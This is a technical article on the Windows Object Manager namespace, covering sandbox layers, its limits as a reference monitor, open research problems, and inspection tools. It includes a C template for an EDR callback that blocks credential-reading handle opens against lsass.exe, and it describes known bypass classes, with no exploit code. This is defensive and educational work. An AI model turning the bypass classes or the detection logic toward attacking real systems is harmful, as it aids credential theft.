Mandatory Integrity Control (NT)	IL band	`SeAccessCheckByType`	Opt-in (per-object SACL)	`SeRelabelPrivilege`	Inherited handles bypass
`ObRegisterCallbacks` (NT)	Per-type, per-driver	Object Manager pre-op callback	Mediation, not partition	KMCS-signed driver	Inheritance bypasses callback
Private Namespace (NT)	Boundary SID-list	`NtCreatePrivateNamespace`	Structural	All SIDs in caller's token	Boundary-keyed
Linux Namespace	Per-resource clone	`setns`/`unshare`/`clone`	Structural	`CAP_SYS_ADMIN`	Fork inherits namespace set
Mach Port Right	Per-task	Capability check on send	Structural (capabilities)	`host_priv` / kernel	Inherited rights on fork

The Object Manager namespace is not a filesystem. There is no disk persistence, no journal, no FAT or MFT, no inode allocator, no per-file DACL in the filesystem sense. Nothing under `\` survives a reboot. Files-on-disk, registry-keys-in-a-hive, and named pipes are leaves in the OM tree, but the actual filesystem implementation lives in NTFS / ReFS / exFAT drivers reached through the `Device` type's parse procedure.

What the OM namespace shares with filesystems is exactly three things: the path-walk algorithm (left-to-right, component-by-component, with one hash-table lookup per component), the per-directory hash table (analogous to the directory-entry hash filesystems use), and the per-object security descriptor (which the SRM enforces at the same point a filesystem would enforce its DACL).

When you read or write the phrase "Object Manager namespace," the metaphor that is doing real work is "in-memory directory tree the kernel uses to find named objects," not "filesystem in the disk-format sense."

As a standalone sandboxing mechanism, the Windows 2000-era `CreateRestrictedToken` primitive sat at the wrong layer: it could not partition the namespace; it only filtered the caller's SID set against per-object DACLs. Chromium revived it in 2008 as one of four cooperating layers, and that pattern is the canonical 2026 production sandbox shape. The Chromium design document captures the constraints: "The Windows sandbox is a user-mode only sandbox. There are no special kernel mode drivers... The sandbox is provided as a static library that must be linked to both the broker and the target executables" (Chromium Sandbox Design [@chromium-sandbox-md], FAQ [@chromium-sandbox-faq]).

The four layers compose pairwise-orthogonally. The token gates which DACLs the renderer can satisfy at SeAccessCheck time; the job object gates which kernel API surface the renderer can call (UI exceptions, process creation, etc.); the integrity level gates which writes the renderer can perform across MIC label boundaries; and the AppContainer's lowbox token makes ObpLookupObjectName rewrite every named-object lookup into the per-package directory. A handle that survives all four checks is the only kind of object the renderer can usefully touch. The load-bearing header is sandbox_policy.h, which declares TargetConfig::SetTokenLevel(TokenLevel initial, TokenLevel lockdown), SetJobLevel, SetIntegrityLevel, SetDelayedIntegrityLevel, and SetAppContainerSid, with one verbatim mutual-exclusion note: "Using an initial token is not compatible with AppContainer" [@chromium-sandbox-policy-h].

This is the 2026 production sandbox shape every Chromium-based browser inherits (Edge, Chrome, Brave, Vivaldi, Opera), as do Electron-based apps like Visual Studio Code's renderer processes.
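The orthogonal composition of the four layers described above can be sketched as four independent predicates, any one of which can refuse a request. Every field name here is hypothetical, and the checks are caricatures of SeAccessCheck, the job object, MIC's no-write-up rule and the lowbox rewrite; only the integrity-level values (Low 0x1000, Medium 0x2000) are the real mandatory-label RIDs.

```javascript
// Toy model of four independent vetoes on one renderer request. All request
// field names are hypothetical; the real checks live in separate kernel paths.
const LOW_IL = 0x1000;
const MEDIUM_IL = 0x2000;

const sandboxLayers = {
  token: (req) => req.daclAllowsRestrictedToken,
  job: (req) => !req.createsProcess,
  integrity: (req) => !req.isWrite || req.targetIntegrity <= req.callerIntegrity, // no write-up
  appContainer: (req) => req.resolvesInsidePackageDirectory,
};

// Return the names of the layers that refuse the request; empty means allowed.
function deniedBy(req) {
  return Object.keys(sandboxLayers).filter((layer) => !sandboxLayers[layer](req));
}

const base = {
  daclAllowsRestrictedToken: true, createsProcess: false, isWrite: true,
  callerIntegrity: LOW_IL, targetIntegrity: LOW_IL, resolvesInsidePackageDirectory: true,
};
console.log(deniedBy(base)); // []
console.log(deniedBy({ ...base, targetIntegrity: MEDIUM_IL })); // [ 'integrity' ]
console.log(deniedBy({ ...base, createsProcess: true, resolvesInsidePackageDirectory: false })); // [ 'job', 'appContainer' ]
```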

The cross-VTL ALPC ports through which a VTL0 process talks to a VTL1 trustlet are still located in VTL0's `\RPC Control`. An attacker who controls VTL0 can *send* messages to LsaIso even though they cannot *read* LsaIso's internal state. Oliver Lyak's December 2022 *Pass-the-Challenge* result is the canonical worked example ([GitHub: ly4k/PassTheChallenge](https://github.com/ly4k/PassTheChallenge)): the trustlet's pages are never read, but the trustlet's RPC output exfiltrates the secret. The lesson is that VTL1 isolation is a *page-level* read barrier, not a *protocol-level* containment property. The VBS Trustlets piece in this corpus carries the deeper walkthrough.

Windows bet on one tree; Linux bet on eight clone-flag dimensions; Darwin bet on capability-style port-right tables. Each bet has theoretical limits. What are they?

8. What the namespace cannot do

The frame for this section comes from James P. Anderson's 1972 USAF technical report Computer Security Technology Planning Study (ESD-TR-73-51), Section 4.1.1. Anderson is the named originator of the reference-monitor concept and of the four properties such a monitor must satisfy. Wikipedia preserves the modern acronym verbatim: the reference-validation mechanism must be "Non-bypassable... Evaluable... Always invoked... Tamper-proof," and "according to Ross Anderson, the reference monitor concept was introduced by James Anderson in an influential 1972 paper" [@wikipedia-reference-monitor]. The NIST CSRC mirror hosts the original PDF [@csrc-nist-ande72].

Saltzer and Schroeder's 1975 paper The Protection of Information in Computer Systems [@cs-virginia-saltzer-schroeder] added the complete-mediation principle -- "every access to every object must be checked for authority" -- and seven other design principles the reference-validation mechanism must satisfy (economy of mechanism, fail-safe defaults, open design, separation of privilege, least privilege, least common mechanism, psychological acceptability).

Map the Windows Object Manager against the four NEAT properties and the answer is uncomfortable. The namespace partially achieves two (Always-invoked and Tamper-proof), fails Non-bypassable outright, and falls one to two orders of magnitude short of Evaluable.

8.1 Always-invoked: provably gapped

The namespace achieves always-invoked for name-based opens. Every Nt*OpenObject* syscall walks ObpLookupObjectName; there is no path that returns a handle to a named object without going through the lookup. But the namespace cannot achieve always-invoked for handle inheritance. A child process inherits handles from CreateProcess(bInheritHandles=TRUE) without going through the OM at all. The handles already exist in the parent's HANDLE_TABLE; the kernel walks the parent's table, duplicates the entries into the child's table, and the child has live access. No name-lookup, no ObRegisterCallbacks callback, no SRM check. As long as the OS API exposes handle inheritance -- and it is too deeply embedded in 33 years of shipping Windows code to remove -- the Object Manager cannot be the sole reference monitor.
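The difference between the two paths into a handle table can be sketched as follows. This is a toy model, not kernel code: the callback is a plain function, entries are marked inheritable as if opened with `OBJ_INHERIT`, and `openProcessByName` / `createChildProcess` are hypothetical names.

```javascript
// Toy contrast between opening by name and inheriting a handle.
// Assumptions: plain-function callback, array handle tables, every entry inheritable.
const PROCESS_VM_READ = 0x0010;
const PROCESS_QUERY_INFORMATION = 0x0400;
const callbackLog = [];

function preOpCallback(target, desired) {
  callbackLog.push(target);
  return target === 'lsass.exe' ? desired & ~PROCESS_VM_READ : desired;
}

// Name-based open: the Object Manager path fires the callback.
function openProcessByName(proc, target, desired) {
  proc.handles.push({ object: target, access: preOpCallback(target, desired), inherit: true });
}

// Inheritance: entries are copied table to table, with no lookup and no callback.
function createChildProcess(parent, bInheritHandles) {
  const handles = bInheritHandles
    ? parent.handles.filter((h) => h.inherit).map((h) => ({ ...h }))
    : [];
  return { handles };
}

const parentProc = { handles: [] };
openProcessByName(parentProc, 'lsass.exe', PROCESS_VM_READ | PROCESS_QUERY_INFORMATION);
const childProc = createChildProcess(parentProc, true);
console.log(callbackLog.length); // 1: only the parent's open was seen
console.log(childProc.handles[0].access.toString(16)); // 400
```

The child ends up with whatever access the parent held, and the callback count does not move. A handle the parent obtained before a sensor registered would be passed on just as silently.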

8.2 Tamper-proof: bounded, not absolute

The Object Manager runs in ring 0, under Kernel-Mode Code Signing (KMCS), and -- on machines with Virtualization-Based Security and Hypervisor-protected Code Integrity (HVCI) enabled -- inside a Hyper-V-enforced code-integrity policy. Any kernel-mode adversary who can load a driver bypasses the OM. KMCS and HVCI raise the cost; they do not eliminate the surface. The Bring-Your-Own-Vulnerable-Driver class of attacks (signed but exploitable drivers) is the running residual class, and the historical pattern is that one or two new vulnerable signed drivers surface every quarter.

8.3 Evaluable: provably above threshold

A small enough TCB can be machine-verified. The seL4 microkernel is the canonical demonstration: roughly 9,000 lines of C verified end-to-end against a formal specification (~11 person-years for initial functional correctness per Klein et al. SOSP 2009, and approximately 25 person-years for the full suite of subsequent proofs including information-flow and binary verification) [@sel4-project]. The Object Manager subsystem, the Security Reference Monitor, and the parse procedures the Object Manager delegates to (file-system drivers via IopParseDevice; the registry via CmpParseKey; ALPC; the I/O manager itself) collectively comprise tens of thousands of lines of C, putting the TCB for "open a named object" at one to two orders of magnitude above the verification threshold any current proof system can handle. The Object Manager is not evaluable in the formal sense Anderson required.

8.4 Non-bypassable: the privilege short-circuit

A process holding SeDebugPrivilege (or any privilege that grants PROCESS_VM_* rights) can short-circuit per-directory ACLs. The privilege evaluation happens at SeAccessCheck time, after ObpLookupObjectName has resolved the name. The Object Manager will resolve any path the privileged caller asks for; the gate fires, but it lets the call through. The namespace cannot defend against the holder of SeDebugPrivilege. This is by design -- you want a debugger to be able to attach to anything -- but it is also the structural reason why "lock down the namespace" is not by itself a containment story.

8.5 What else the namespace cannot do

It cannot prevent in-process memory disclosure -- the Pass-the-Challenge limit covered in the Section 7 aside. It cannot defend against a malicious driver -- KMCS, HVCI, and WDAC gate driver load; the namespace itself trusts already-loaded drivers. It cannot eliminate time-of-check / time-of-use racing during a path walk; the walker walks components one at a time, and any reentrant call into the walker is a TOCTOU surface. The mitigation is per-call -- callers pass OBJ_DONT_REPARSE on object-attributes, FILE_FLAG_OPEN_REPARSE_POINT on file opens, or otherwise instruct the path-walker to refuse symbolic-link substitution -- not a structural property of the namespace.
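The per-call nature of that mitigation is easy to see in a toy walker. The `OBJ_DONT_REPARSE` value (0x1000) and the `STATUS_REPARSE_POINT_ENCOUNTERED` result follow the `OBJECT_ATTRIBUTES` documentation; the namespace shape, the planted link and `walkPath` itself are hypothetical simplifications.

```javascript
// Toy path walker showing what a per-call "don't reparse" flag buys.
// Only the flag value and the reparse status name follow Windows docs.
const OBJ_DONT_REPARSE = 0x00001000;
const MAX_REPARSE = 8; // hypothetical loop guard

function walkPath(root, path, attributes, depth = 0) {
  if (depth > MAX_REPARSE) return { status: 'too many reparses' };
  const parts = path.split('\\').filter(Boolean);
  let node = root;
  for (let i = 0; i < parts.length; i++) {
    node = node.children ? node.children[parts[i]] : undefined;
    if (!node) return { status: 'not found' };
    if (node.type === 'SymbolicLink') {
      if (attributes & OBJ_DONT_REPARSE) return { status: 'STATUS_REPARSE_POINT_ENCOUNTERED' };
      const rest = parts.slice(i + 1).join('\\');
      return walkPath(root, node.target + (rest ? '\\' + rest : ''), attributes, depth + 1);
    }
  }
  return { status: 'ok', object: node };
}

// A privileged object and a planted link pointing at it (hypothetical names).
const omRoot = {
  children: {
    Secret: { type: 'Section' },
    Public: { children: { Config: { type: 'SymbolicLink', target: '\\Secret' } } },
  },
};
console.log(walkPath(omRoot, '\\Public\\Config', 0).status); // ok
console.log(walkPath(omRoot, '\\Public\\Config', OBJ_DONT_REPARSE).status); // STATUS_REPARSE_POINT_ENCOUNTERED
```

Nothing in the namespace changes between the two calls; only the caller's flag does, which is why the protection exists only for callers who ask for it.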

8.6 The honest accounting

The Object Manager namespace is a coordination mechanism, not a containment mechanism. Containment is in the layers above: the session ID, the package SID, the integrity level, the silo ID, the VTL split. The namespace's job is to make those layers enforceable by partitioning the path space so the bad open cannot resolve to the privileged object's name. The layers above decide which partition the caller is in; the namespace's only job is "given a path and a caller, find the object." Anderson 1972 names the kernel mechanism (the reference-validation mechanism with NEAT properties); Saltzer-Schroeder 1975 names the design principles the mechanism must satisfy. The Object Manager is the Windows realisation; it inherits both the strengths and the limits.


Key idea: The Object Manager is the coordination layer; the containment is in the partition primitives stacked on top (session ID, package SID, integrity level, silo ID, VTL). The namespace's only job is "given a path and a caller, find the object." Every Windows security boundary is a parameter to that one job: a per-directory ACL, a token-keyed name rewrite, or a kernel callback registered against an OBJECT_TYPE.

The provable gaps are real. What is the active research direction in 2026 -- where do attackers and defenders actually meet inside the namespace today?

9. Open problems in 2026

Five open problems sit in active research as of 2026.

9.1 Hash-bucket collision pressure

The 37-bucket constant has not changed since 1993. On a 2026 Windows 11 25H2 machine with several hundred MSIX packages, each owning an \AppContainerNamedObjects\<package-sid>\ subtree, average chain lengths inside \Sessions\1\AppContainerNamedObjects exceed two and routinely run higher under load. The structural impact is small per-lookup (O(chain length) at each component), but it compounds across deep path walks and across the per-VM hot loops in ObpLookupObjectName. Microsoft has not committed to a larger table or a different structure; the constant remains.
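A back-of-the-envelope check on the chain-length claim: if names hash roughly uniformly, a directory with n entries in 37 buckets has an expected chain length of n / 37, so about 100 package SIDs already put the average above two. The sketch assumes a toy multiply-by-31 hash (not the kernel's) and synthetic, hypothetical SID strings; by pigeonhole, the longest chain can never be shorter than ceil(n / 37).

```javascript
// Expected vs. observed chain lengths in one 37-bucket directory.
// Assumptions: toy hash (not the kernel's) and synthetic package-SID names.
const BUCKETS = 37;

function toyHash(name) {
  let h = 0;
  for (const ch of name.toUpperCase()) h = (h * 31 + ch.charCodeAt(0)) >>> 0;
  return h % BUCKETS;
}

function chainStats(names) {
  const counts = new Array(BUCKETS).fill(0);
  for (const n of names) counts[toyHash(n)]++;
  return {
    expected: names.length / BUCKETS, // mean entries per bucket
    longest: Math.max(...counts), // worst chain a lookup might scan
    total: counts.reduce((a, b) => a + b, 0),
  };
}

// 300 hypothetical package SIDs, one directory entry each.
const sids = Array.from({ length: 300 }, (_, i) => `S-1-15-2-${1000 + i}`);
const stats = chainStats(sids);
console.log(stats.expected.toFixed(2), stats.longest); // first value is 8.11; the second depends on the toy hash
```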

9.2 Cross-AppContainer object-directory privacy

Per-AppContainer isolation is the AppContainer model's promise; residual cross-package reads erode it. Forshaw's Project Zero work between 2017 and 2020 documents specific classes; Windows 11 25H2 DACLs are tighter than Windows 10 RTM, but the impersonation-mediated cases survive. The HackSys / CVE-2023-35359 family covered in Section 4.5 is the current realisation of the cross-AppContainer-plus-impersonation surface, and the same broader resource-planting taxonomy Forshaw described in the 2017 Named Pipe Secure Prefixes post [@tiraniddo-named-pipe-secure-prefixes] is still rediscovered every year.

9.3 Silo-escape via routines that ignore silo attachment

Siloscape (June 7, 2021) showed that NtSetInformationSymbolicLink could retarget a silo-scoped symbolic link at a host-scoped path. Microsoft patched the specific function; the class -- kernel routines whose path resolution does not honour Process->Silo->RootDirectory -- remains open. Microsoft's long-standing position is that Server Silo is not a security boundary; Hyper-V Container is the security-boundary product. Container runtimes that depend on Server Silo for tenant isolation are knowingly running outside the supported boundary.

9.4 ObRegisterCallbacks erosion under HVCI

ObRegisterCallbacks requires a KMCS-signed driver, and on HVCI-enabled machines the binary must additionally be HVCI-compatible. Microsoft has progressively raised the compatibility bar -- preventing unsigned drivers, banning common runtime-patching idioms, and tightening the W^X policy. EDR vendors depend on the surface staying open; if HVCI's compatibility bar ever excludes the EDR kernel driver pattern, the in-kernel callback layer is at risk. The CrowdStrike Falcon Sensor outage of July 2024 made the brittleness of in-kernel EDR a public conversation. Microsoft's Defender for Endpoint and EDR-on-Linux eBPF projects point at alternative-mediation futures, but in-kernel ObRegisterCallbacks is still the primary credential-theft sensor.

Note: As attackers ship Hell's Gate / Halo's Gate / direct-syscall stubs to bypass userland EDR hooks, the kernel callback fires regardless. The arms race accordingly shifts to the access-mask-strip vs. impersonate-trusted-parent-PID layer inside the kernel callback itself, with both sides racing to define the right pre-operation policy for lsass.exe handle opens. Watch the Microsoft Security Response Center advisories and the EDR-vendor incident postmortems for the bleeding edge.

9.5 Public benchmark vacuum

No peer-reviewed benchmark compares per-call namespace-lookup cost across the Windows Object Manager, Linux namespaces, and Mach ports. Choice of namespace design at the OS level is a multi-decade commitment; the absence of an empirical comparison forces architecture decisions on theoretical-only grounds. The Linux Kernel Test Robot, the Phoronix Test Suite, and various academic systems-conference benchmarks measure adjacent properties (filesystem-call latency, system-call vector cost), but none publishes head-to-head numbers on the named-object-lookup hot path. This is an open invitation to systems researchers.

Five open problems is a research agenda, not a how-to. How do you actually look at this thing on your own machine?

10. Reading the namespace from a live system

Three tools cover the operational practice: Sysinternals WinObj, Forshaw's NtObjectManager PowerShell module, and WinDbg in kernel mode.

10.1 WinObj on a live system

Download winobj.exe from Sysinternals [@ms-winobj] and run it as administrator. The left pane is the directory tree; the right pane shows the children of the selected directory with their object types. Navigate to \Sessions\1\BaseNamedObjects and read off the named events and mutants every Win32 app in your interactive session has created. Navigate to \Sessions\1\AppContainerNamedObjects and pick an S-1-15-2-... directory; right-click, choose Properties, and read the security descriptor. You will see a single allow-ACE granting full access only to the package SID itself. That ACE is the entire AppContainer sandbox at the namespace layer.

Note: WinObj cannot traverse \ObjectTypes, \Security, or \Sessions\0\ without administrator rights. Without traverse access, the enumeration fails silently and the tree looks empty. Always run elevated, and accept that the tool shows the kernel view, not a per-process view.

10.2 NtObjectManager PowerShell

NtObjectManager is Forshaw's PowerShell module that exposes the Object Manager namespace through cmdlets (PowerShell Gallery [@powershellgallery-ntobjectmanager]; GitHub [@p0-sandbox-attacksurface-analysis-tools]). Install with Install-Module NtObjectManager. Useful commands: Get-ChildItem NtObject:\ walks the root; Get-NtType lists the registered OBJECT_TYPE singletons; Get-NtObject \BaseNamedObjects enumerates the global BNO; Get-NtAlpcPort '\RPC Control' lists every LRPC endpoint on the machine. The module wraps the same NTDLL syscalls WinObj uses, but in a scripting surface that composes into automation.

10.3 WinDbg kernel session

In a kernel-mode WinDbg session attached to a target machine (or to the live local kernel via Microsoft's local kernel debugging mode), !object \ dumps the root directory and its children. dt nt!_OBJECT_HEADER <addr>-30 reads the header preceding any object's body (on x64 the body begins at offset 0x30 inside OBJECT_HEADER, so subtracting 0x30 from the body pointer lands on the header; the field layout is documented in *Windows Internals* 7th Edition, Chapter 8, Microsoft Press Store [@microsoftpressstore-wininternals7-part1]). `dx -r1 ((nt!_OBJECT_TYPE)nt!PsProcessType[0]).TypeInfo` walks the Process type's method table and lists all eight procedure pointers and the WaitObjectFlagOffset, including the parse procedure.
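The `<addr>-30` arithmetic is worth spelling out, because WinDbg's default radix is 16: the `30` in that command already means 0x30, not decimal 30. The sketch assumes the x64 offset of 0x30 stated above and a made-up body address; `headerFromBody` is a hypothetical helper.

```javascript
// Header-from-body arithmetic. Assumptions: x64, body at offset 0x30 inside
// OBJECT_HEADER; the body address is made up. BigInt keeps 64-bit precision.
const OBJECT_HEADER_BODY_OFFSET = 0x30n;

function headerFromBody(bodyAddress) {
  return bodyAddress - OBJECT_HEADER_BODY_OFFSET;
}

const sampleBody = 0xffffc5069d4a2080n; // hypothetical object body pointer
console.log(headerFromBody(sampleBody).toString(16)); // ffffc5069d4a2050
console.log((30).toString(16)); // 1e: what "-30" would mean if it were decimal
```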

10.4 The EDR primitive: an ObRegisterCallbacks driver template

The minimal sketch of an in-kernel EDR sensor is four steps. Register an OB_CALLBACK_REGISTRATION for PsProcessType with OB_OPERATION_HANDLE_CREATE | OB_OPERATION_HANDLE_DUPLICATE [@ms-obregistercallbacks]. In the pre-operation callback, examine OperationInformation->Object, derive the target process's PID, and compare it against lsass.exe. If it matches, strip credential-relevant access bits from OperationInformation->Parameters->CreateHandleInformation.DesiredAccess (or from DuplicateHandleInformation.DesiredAccess for a duplication). The kernel grants the handle with the reduced rights, the attacker's PROCESS_VM_READ is gone before the call returns, and the post-operation callback logs the attempt. The parallel API PsSetCreateProcessNotifyRoutineEx [@ms-pssetcreateprocessnotifyroutineex] covers process creation, which is the other half of the EDR sensor surface.

```mermaid
sequenceDiagram
    participant A as Attacker process
    participant NT as nt!NtOpenProcess
    participant OM as Object Manager
    participant EDR as EDR Pre-Op Callback
    participant LSASS as lsass.exe (target)
    A->>NT: NtOpenProcess(lsass PID, PROCESS_VM_READ | PROCESS_QUERY_INFORMATION)
    NT->>OM: lookup PsProcessType, target by PID
    OM->>EDR: fire pre-op callback (handle create)
    EDR->>EDR: target == lsass.exe?
    EDR->>EDR: strip PROCESS_VM_READ from DesiredAccess
    EDR-->>OM: granted = PROCESS_QUERY_LIMITED_INFORMATION
    OM-->>NT: HANDLE with reduced access
    NT-->>A: open succeeded (but useless rights)
```

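```javascript
// Access-mask constants from the Windows process access-rights table.
const PROCESS_CREATE_THREAD = 0x0002;
const PROCESS_VM_OPERATION = 0x0008;
const PROCESS_VM_READ = 0x0010;
const PROCESS_VM_WRITE = 0x0020;
const PROCESS_DUP_HANDLE = 0x0040;
const PROCESS_QUERY_INFORMATION = 0x0400;
const PROCESS_QUERY_LIMITED_INFORMATION = 0x1000;

// A pre-operation callback may only clear bits from DesiredAccess, never add them.
function stripForLsass(desired) {
  const STRIPPED = PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION |
    PROCESS_CREATE_THREAD | PROCESS_DUP_HANDLE | PROCESS_QUERY_INFORMATION;
  return desired & ~STRIPPED;
}

const requested = PROCESS_VM_READ | PROCESS_QUERY_INFORMATION | PROCESS_DUP_HANDLE;
// Modelling assumption: a PROCESS_QUERY_INFORMATION request also carries
// PROCESS_QUERY_LIMITED_INFORMATION, which such a handle is automatically granted.
const desired = (requested & PROCESS_QUERY_INFORMATION)
  ? requested | PROCESS_QUERY_LIMITED_INFORMATION
  : requested;
console.log('attacker asked for:', '0x' + requested.toString(16)); // 0x450
console.log('EDR pre-op granted:', '0x' + stripForLsass(desired).toString(16)); // 0x1000
```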

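```c
#include <ntddk.h>

/* MyPreOp / MyPostOp are the driver's own callbacks (bodies omitted). */
OB_PREOP_CALLBACK_STATUS MyPreOp(PVOID Ctx, POB_PRE_OPERATION_INFORMATION Info);
VOID MyPostOp(PVOID Ctx, POB_POST_OPERATION_INFORMATION Info);

static PVOID g_handle; /* cookie later passed to ObUnRegisterCallbacks */

NTSTATUS RegisterLsassSensor(VOID) /* hypothetical helper name */
{
    OB_OPERATION_REGISTRATION op = {
        .ObjectType = PsProcessType,
        .Operations = OB_OPERATION_HANDLE_CREATE | OB_OPERATION_HANDLE_DUPLICATE,
        .PreOperation = MyPreOp,
        .PostOperation = MyPostOp,
    };
    OB_CALLBACK_REGISTRATION reg = {
        .Version = OB_FLT_REGISTRATION_VERSION,
        .OperationRegistrationCount = 1,
        .Altitude = RTL_CONSTANT_STRING(L"123456"),
        .OperationRegistration = &op,
    };
    return ObRegisterCallbacks(&reg, &g_handle);
}
```

The driver image must be linked with `/INTEGRITYCHECK` (which sets `IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY`) and KMCS-signed, per the wdm.h documentation; otherwise `ObRegisterCallbacks` returns `STATUS_ACCESS_DENIED`. Two drivers cannot register at the same Altitude; a collision returns `STATUS_FLT_INSTANCE_ALTITUDE_COLLISION`.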

You can now read the namespace, register an EDR-style callback, and dump the type registry. What are the questions readers ask after they finish reading?

11. Frequently asked questions

No. The registry is a separate Windows Executive subsystem implemented in `nt!Cm*`, with its own hive on-disk format and its own in-memory hive structures. It hooks into the Object Manager namespace through one and only one mechanism: the `Key` `OBJECT_TYPE` registers a `ParseProcedure` (`CmpParseKey`) that takes over path walking when the namespace walker reaches `\REGISTRY`. The registry is therefore a *consumer* of the Object Manager, but not part of the Object Manager.

Because `\BaseNamedObjects` is the *global* / `Global\`-prefixed-only view, distinct from the per-session BNO at `\Sessions\\BaseNamedObjects`. The Win32 `Local\` prefix routes through `kernel32!BaseGetNamedObjectDirectory` into the per-session BNO; `Global\` routes into the global one [@ms-termserv-kernel-object-namespaces]. Cross-session named-object coordination still needs the global view; per-session isolation lives in the per-session subtree.

Because the lowbox token attached to the UWP app's process tells `ObpLookupObjectName` to rewrite the path to `\Sessions\\AppContainerNamedObjects\\Global\Foo` before path walking. Two different UWP apps have two different package SIDs and therefore land on two different directories. The Win32 names look the same; the kernel resolves them to different objects.

`\??\C:` is the per-session DosDevices alias; if `C:` is not defined in the current session's `\??`, the walker falls through to `\GLOBAL??\C:`. `\GLOBAL??\C:` is the machine-wide DosDevices symbolic link to `\Device\HarddiskVolume*` -- the real on-disk volume object. The split matters because the per-session `\??` is where per-session drive-letter remappings (`net use X: \\server\share`, `subst Z: C:\foo`, `DefineDosDevice`) live, and the activation-context resolver class covered in Section 4.5 is the exploit family that lives at this boundary.

Several top-level directories have `Directory`-`TRAVERSE` ACLs that restrict to SYSTEM and the local Administrators group. Without traversal, the directory enumeration silently fails. `\ObjectTypes`, `\Security`, and `\Sessions\0\` are the directories users most often notice as "missing" when running unelevated.

By DACL plus loader-side validation. The directory grants `Directory`-`READ` to everyone but `Directory`-`WRITE` only to SYSTEM and TrustedInstaller. The `Section` objects inside are Authenticode-signed by Microsoft and validated at boot by `smss.exe`. The historical `DefineDosDevice` + `\??` symlink-plant bypass class survived until Windows 10 21H2 build 19044.1826 (July 2022), when an NTDLL patch closed it [@itm4n-the-end-of-ppldump].

`ObRegisterCallbacks` [@ms-obregistercallbacks] and `PsSetCreateProcessNotifyRoutineEx` [@ms-pssetcreateprocessnotifyroutineex] are both fully documented. The HVCI compatibility requirements, the KMCS attestation flow, and the exact policy interactions with Defender for Endpoint's tamper-protection layer are partly implementation-defined; EDR vendor engineering teams maintain private regression suites against successive Windows feature updates.

When two or more processes that don't share a session or package must coordinate over a securable directory keyed by a SID-list they agree on at design time. The boundary descriptor is the *agreement primitive*: the kernel requires every SID in the boundary to be in the caller's token. The namespace's `OBJECT_DIRECTORY` lives in `\BNOLINKS`, keyed by the alias-prefix string plus a hash of the boundary descriptor's SID-list (CreatePrivateNamespaceW [@ms-createprivatenamespacew]; Object Namespaces overview [@ms-object-namespaces]; native NtCreatePrivateNamespace [@ntdoc-ntcreateprivatenamespace] and OBJECT_BOUNDARY_DESCRIPTOR [@ntdoc-object-boundary-descriptor] signatures). From inside an AppContainer process the lookup is rewritten into the per-package subtree, so private namespaces are not a substitute for the `windows.applicationModel.*` brokered APIs when cross-package coordination is the goal.

A user-mode structure produced by `CreateBoundaryDescriptor` and populated with `AddSIDToBoundaryDescriptor` (plus the optional `CREATE_BOUNDARY_DESCRIPTOR_ADD_APPCONTAINER_SID` flag). Conceptually the descriptor is a SID-list that the caller and every other participant must share via their tokens. Kernel-side the structure is `OBJECT_BOUNDARY_DESCRIPTOR` (Version, Items, TotalSize, Flags). `NtCreatePrivateNamespace` materialises a directory in `\BNOLINKS` keyed by the `lpAliasPrefix` plus a hash of the boundary descriptor's SIDs.
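The agreement rule for private namespaces can be modeled in a few lines. This is a hypothetical JavaScript sketch, not the kernel's algorithm. `namespaceKey` combines the alias prefix with a hash of the SID list, using FNV-1a as a stand-in for whatever hash the kernel actually uses. Sorting the SIDs so that order does not matter is an assumption of this model. `canOpenNamespace` enforces the rule described above: every boundary SID must appear in the caller's token. The domain SIDs are made up; `S-1-5-32-544` (Administrators) and `S-1-1-0` (Everyone) are well-known SIDs.

```javascript
// Hypothetical model of private-namespace keying; FNV-1a stands in for the real hash.
function fnv1a32(text) {
  let h = 0x811c9dc5;
  for (let i = 0; i < text.length; i++) {
    h ^= text.charCodeAt(i);
    h = Math.imul(h, 0x01000193) >>> 0;
  }
  return h >>> 0;
}

// Directory key = alias prefix + hash of the boundary's SID list.
// Sorting makes SID order irrelevant in this model (an assumption).
function namespaceKey(aliasPrefix, boundarySids) {
  const sids = [...boundarySids].sort().join(';');
  return aliasPrefix + ':' + fnv1a32(sids).toString(16).padStart(8, '0');
}

// Every SID in the boundary must be present in the caller's token.
function canOpenNamespace(tokenSids, boundarySids) {
  const token = new Set(tokenSids);
  return boundarySids.every((sid) => token.has(sid));
}

const boundary = ['S-1-5-21-1000-2000-3000-1104', 'S-1-5-32-544'];
const creatorToken = ['S-1-5-21-1000-2000-3000-1104', 'S-1-5-32-544', 'S-1-1-0'];
const outsiderToken = ['S-1-5-21-1000-2000-3000-1105', 'S-1-1-0'];

console.log(namespaceKey('MyApp', boundary));
console.log('creator may open:', canOpenNamespace(creatorToken, boundary));
console.log('outsider may open:', canOpenNamespace(outsiderToken, boundary));
```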

12. Coming back to the WinObj screen

Open WinObj one more time. Navigate back to \Sessions\1\AppContainerNamedObjects and pick the Edge renderer's S-1-15-2-... directory. You can now name everything you are looking at. The directory is an _OBJECT_DIRECTORY instance with 37 hash buckets. You reach it through a token-keyed rewrite that the kernel applies inside ObpLookupObjectName before path walking begins. Its security descriptor grants GenericAll only to the package SID. Every EDR loaded on this machine has registered an ObRegisterCallbacks filter on PsProcessType, watching for handle creations against lsass.exe. If you are running on a Server SKU with Windows Server Containers, the directory might also be silo-scoped, with Process->Silo->RootDirectory indirecting your view of the rest of \.
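This article keeps returning to two resolution tricks: the token-keyed AppContainer rewrite and the `\??` to `\GLOBAL??` fallthrough. Both can be sketched as pure functions. This is a hypothetical JavaScript model that follows the article's description, not `ObpLookupObjectName` itself. The token shape, the package SID `S-1-15-2-1111`, the volume number, and the planted device path are made-up illustrations.

```javascript
// Hypothetical model of two name-resolution rules; not ObpLookupObjectName itself.
function splitScope(win32Name) {
  const i = win32Name.indexOf('\\');
  const prefix = i < 0 ? '' : win32Name.slice(0, i);
  if (prefix === 'Global' || prefix === 'Local') {
    return { scope: prefix, leaf: win32Name.slice(i + 1) };
  }
  return { scope: 'Local', leaf: win32Name }; // unprefixed names default to Local
}

// Token-keyed rewrite: a lowbox (AppContainer) token redirects every name
// into that package's own directory, so Global\Foo cannot escape it.
function rewriteForToken(win32Name, token) {
  const { scope, leaf } = splitScope(win32Name);
  if (token.packageSid) {
    const base = `\\Sessions\\${token.sessionId}\\AppContainerNamedObjects\\${token.packageSid}`;
    return scope === 'Global' ? `${base}\\Global\\${leaf}` : `${base}\\${leaf}`;
  }
  return scope === 'Global'
    ? `\\BaseNamedObjects\\${leaf}`
    : `\\Sessions\\${token.sessionId}\\BaseNamedObjects\\${leaf}`;
}

// DosDevices lookup: the per-session \?? wins; otherwise fall through to \GLOBAL??.
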